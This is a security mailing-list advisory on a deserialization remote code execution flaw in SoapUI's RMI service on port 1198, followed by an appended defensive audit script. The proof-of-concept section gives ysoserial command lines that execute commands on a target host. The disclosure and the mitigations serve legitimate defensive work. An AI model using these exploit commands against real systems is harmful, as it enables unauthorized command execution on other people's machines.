Full Disclosure mailing list archives
SmartBear SoapUI - Remote Code Execution via Deserialization
From: Etnies <kuba25101990 () gmail com>
Date: Thu, 5 Oct 2017 12:17:46 +0200
Title: SmartBear SoapUI - Remote Code Execution via Deserialization
Author: Jakub Palaczynski
Date: 12. July 2017

Exploit tested on:
==================
SoapUI 5.3.0
Also works on older versions.

Vulnerability:
**************

Remote Code Execution via Deserialization:
==========================================

SoapUI by default listens on all interfaces on TCP port 1198, where the SoapUI Integration (RMI) instance can be found.
SoapUI ships vulnerable Java libraries (commons-collections-3.2.1.jar and groovy-all-2.1.7.jar) which can be used to remotely execute commands with the permissions of the user that started SoapUI.

Entry point: Java RMI Registry on TCP port 1198
Vulnerable libraries used: commons-collections-3.2.1.jar and groovy-all-2.1.7.jar

Proof of Concept:

Sample PoC using the vulnerable Commons Collections library:
java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP'

Sample PoC using the vulnerable Groovy library:
java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP'

Mitigations:
- bind the SoapUI Integration instance to localhost if possible
- update all Java libraries that are known to be vulnerable:
  commons-collections-3.2.1.jar
  groovy-all-2.1.7.jar

Contact:
========
Jakub[dot]Palaczynski[at]gmail[dot]com

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
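As an added defender-side check (not part of the advisory above), the POSIX shell script below audits a SoapUI installation for the two mitigation points the advisory lists: it looks for the vulnerable jar versions named there under the install directory, and reports any TCP 1198 listener bound to a non-loopback address. The install path argument and the use of `ss` for listener discovery are assumptions.

```shell
#!/bin/sh
# Added audit helper for the two mitigations in the advisory. Not SmartBear's
# code; the install directory is passed as $1 (e.g. the SoapUI-5.3.0 folder).

# Exact jar file names the advisory identifies as vulnerable.
VULN_JARS="commons-collections-3.2.1.jar groovy-all-2.1.7.jar"

# has_vulnerable_jars DIR
# Prints each vulnerable jar found anywhere under DIR.
# Returns 0 (true) if at least one was found, 1 if none were.
# Note: matches by file name only; a renamed or shaded copy is not caught.
has_vulnerable_jars() {
    dir="$1"
    status=1
    for jar in $VULN_JARS; do
        if find "$dir" -type f -name "$jar" 2>/dev/null | grep -q .; then
            echo "VULNERABLE: $jar found under $dir"
            status=0
        fi
    done
    return $status
}

# exposed_rmi_listeners
# Filter: reads ss/netstat-style local addresses ("0.0.0.0:1198",
# "[::1]:1198", "*:1198") on stdin and prints those on port 1198 that are
# not bound to a loopback address. Exit status 0 if any were printed.
exposed_rmi_listeners() {
    grep ':1198$' | grep -v -e '^127\.' -e '^\[::1\]'
}

# rmi_exposed
# Live check of the current host: assumes iproute2 `ss` is available.
# Column 4 of `ss -Hltn` is the local address:port of each TCP listener.
rmi_exposed() {
    ss -Hltn 2>/dev/null | awk '{ print $4 }' | exposed_rmi_listeners
}

# Usage: sh soapui_audit.sh /path/to/SoapUI   (path is an example)
if [ $# -gt 0 ]; then
    has_vulnerable_jars "$1" || echo "OK: no known-vulnerable jar names under $1"
    if rmi_exposed; then
        echo "EXPOSED: the listener(s) above accept RMI connections from the network"
    else
        echo "OK: no non-loopback listener on TCP 1198"
    fi
fi
```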